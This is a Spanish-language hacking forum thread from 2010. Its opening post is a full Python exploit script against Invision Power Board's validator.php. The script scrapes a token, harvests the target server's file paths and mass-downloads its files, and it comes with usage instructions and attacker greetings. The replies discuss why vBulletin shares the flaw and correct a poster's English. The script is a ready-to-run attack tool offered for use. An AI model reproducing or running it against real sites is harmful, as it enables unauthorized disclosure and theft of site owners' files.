Título: InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
Publicado por: c0de.breaker en 24 Enero 2010, 23:02 pm
(http://i45.tinypic.com/ieqo8m.jpg) #! /usr/bin/env python3.1
################################################################
# _____ _____ ____ (validator.php) #
# |_ _| __ \| _ \ #
# | | | |__) | |_) | #
# | | | ___/| _ < #
# _| |_| | | |_) | #
# |_____|_| |____/ #
# @expl0it... #
################################################################
# [ IPB Files / Directories Full Disclosure ] #
# [ Vuln discovered by TinKode / xpl0it written by cmiN ] #
# [ Greetz: insecurity.ro, darkc0de.com ] #
################################################################
# #
# Special thanks for: cmiN #
# www.TinKode.BayWords.com #
################################################################
import os, sys, urllib.request, urllib.parse, threading
def main():
logo = """
\t |---------------------------------------------------------------|
\t | _____ _____ ____ (TM) |
\t | |_ _| __ \| _ \ |
\t | | | | |__) | |_) | |
\t | | | | ___/| _ < |
\t | _| |_| | | |_) | |
\t | |_____|_| |____/ |
\t | |
\t | |
\t | IPB Full Disclosure expl0it |
\t | Written by cmiN |
\t | Vulnerability discovered by TinKode |
\t | |
\t | |
\t | Visit: www.insecurity.ro & www.darkc0de.com |
\t |---------------------------------------------------------------|
"""
usage = """
|---------------------------------------------------------------|
|Usage: ipbfd.py scan http://www.site.com/IPB_folder |
| ipbfd.py download *.zip -> all |
| ipbfd.py download name.jpg -> one |
|---------------------------------------------------------------|"""
if sys.platform in ("linux", "linux2"):
clearing = "clear"
else:
clearing = "cls"
os.system(clearing)
print(logo)
args = sys.argv
if len(args) == 3:
try:
print("Please wait...")
if args[1] == "scan":
extract_parse_save(args[2].strip("/"))
elif args[1] == "download":
download_data(args[2])
except Exception as message:
print("An error occurred: {}".format(message))
except:
print("Unknown error.")
else:
print("Ready!")
else:
print(usage)
input()
def extract_parse_save(url):
print("[+]Extracting content...")
hurl = url + "/validator.php"
with urllib.request.urlopen(hurl) as usock:
source = usock.read().decode()
print("[+]Finding token...")
word = "validate('"
index = source.find(word)
if index != -1:
source = source[index + len(word):]
value = source[:source.index("'")]
hurl = url + "/validator.php?op={}".format(value)
else:
print("[!]Token not found.")
print("[+]Obtaining paths...")
with urllib.request.urlopen(hurl) as usock:
lastk, lastv = None, None
dictionary = dict()
for line in usock:
line = line.decode()
index = line.find("<td>")
if index != -1:
lastk = line[index + 4:line.index("</td>")].strip(" ").strip(" ")
index = line.find("<strong>")
if index != -1:
lastv = line[index + 8:line.index("</strong>")].strip(" ")
if lastk != None and lastv != None:
index = lastk.rfind(".")
if index in (-1, 0):
lastk = "[other] {}".format(lastk)
else:
lastk = "[{}] {}".format(lastk[index + 1:], lastk)
dictionary[lastk] = lastv
lastk, lastv = None, None
print("[+]Organizing and saving paths...")
with open("IPBlogs.txt", "w") as fout:
fout.write(url + "\n")
keys = sorted(dictionary.keys())
for key in keys:
fout.write("{} ({})\n".format(key, dictionary[key]))
def download_data(files):
print("[+]Searching and downloading files...")
mthreads = 50
with open("vBlogs.txt", "r") as fin:
url = fin.readline().strip("\n").strip("/")
if files.find("*") == -1:
hurl = url + "/" + files.strip("/")
Download(hurl).start()
else:
ext = files[files.rindex(".") + 1:]
for line in fin:
pieces = line.strip("\n").split(" ")
if pieces[0].count(ext) == 1:
upath = pieces[1]
hurl = url + "/" + upath.strip("/")
while threading.active_count() > mthreads:
pass
Download(hurl).start()
while threading.active_count() > 1:
pass
class Download(threading.Thread):
def __init__(self, url):
threading.Thread.__init__(self)
self.url = url
def run(self):
try:
with urllib.request.urlopen(self.url) as usock:
data = usock.read()
uparser = urllib.parse.urlparse(usock.geturl())
pieces = uparser.path.split("/")
fname = pieces[len(pieces) - 1]
with open(fname, "wb") as fout:
fout.write(data)
except:
pass
if __name__ == "__main__":
main() You must have python 3.1 to work!
Título: Re: InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
Publicado por: ~ Yoya ~ en 24 Enero 2010, 23:22 pm
Esto deviria ir en Bug y Exploit.
Título: Re: InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
Publicado por: AlbertoBSD en 24 Enero 2010, 23:28 pm
No, esta bien aqui, al parecer es la misma falla que afecta a al vBulletin.
Es comun que cuando ves una falla en un CMS también aparezcan en otro CMS
Saludos
No, it is well placed here, apparently is the same flaw that affects the vBulletin.
It is common that a flaw seen into a CMS also appears in other CMS.
regards
Título: Re: InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
Publicado por: tragantras en 25 Enero 2010, 14:33 pm
No, this well here, apparently is the same flaw affecting the vBulletin.
It is common that when you see a fault in a CMS also appear in other CMS
Regards
No, it is well placed here, apparently is the same flaw that affects the vBulletin. It is common that a flaw seen into a CMS also appear s in other CMS. regards espero no molestar por tomarme la libertad de corregirte, un saludo
Título: Re: InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
Publicado por: WHK en 25 Enero 2010, 17:56 pm
Y la pregunta del millon de dolares... porqué ipboard y vbulletín tienen el mismo archivo vulnerable?
buscaré mas info porque parece que esto da para rato.
Título: Re: InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
Publicado por: AlbertoBSD en 25 Enero 2010, 22:04 pm
Y la pregunta del millon de dolares... porqué ipboard y vbulletín tienen el mismo archivo vulnerable?
Jaja juralo que yo me pregunte lo mismo. Saludos
espero no molestar por tomarme la libertad de corregirte, un saludo
Nunca es molestia :D aprender de los que saben, con eso de que yo no he estudiado ingles, la verdad que si me hace falta.
Título: Re: InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
Publicado por: c0de.breaker en 25 Enero 2010, 22:48 pm
Because are nulled by the same "team" :D
|